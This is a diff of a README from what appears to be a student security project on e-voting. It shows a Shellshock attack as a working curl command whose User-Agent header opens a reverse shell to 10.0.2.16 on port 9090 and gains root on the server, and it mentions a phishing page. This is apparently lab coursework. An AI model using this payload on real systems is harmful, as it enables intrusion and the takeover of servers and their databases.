Cloud9-ine/E-Voting_SPC/README.md

 ![8efc4d42775d0fd8d38ecab40dc75cb](https://user-images.githubusercontent.com/78676028/141211697-325996b6-465c-4613-9121-6af077ea0c6a.png)

+   Running the database initialization, you can see that our original bash has been removed and we adopted the new vulnerable bash.

-   Then we can carry out the Shellshock Attack like what we did in homework 2.
+Then we can carry out the Shellshock Attack like what we did in homework 2 with the following example code:

-   加油孙旭华
+      $ curl --header 'User-Agent: () { :; }; echo; /bin/bash -i > /dev/tcp/10.0.2.16/9090 0<&1 2>&1' http://localhost:8000/cgi-bin/home.cgi

+   You can change the IP inside the command to your own IP.

 ![19ce6ddac3e03f10fcf12afaac2921f](https://user-images.githubusercontent.com/78676028/141211804-15bebb90-90d3-43a9-84de-8c63df8922c6.png)

+   Similarly, by listening the corresponding port meanwhile, you can get the root privilege of the server.
+Here we just use a simple "ls" command to show the successful control.
+With this privilege, you can actually do anything to the server, and the database in the backend.

 4. Phishing Page (Completed)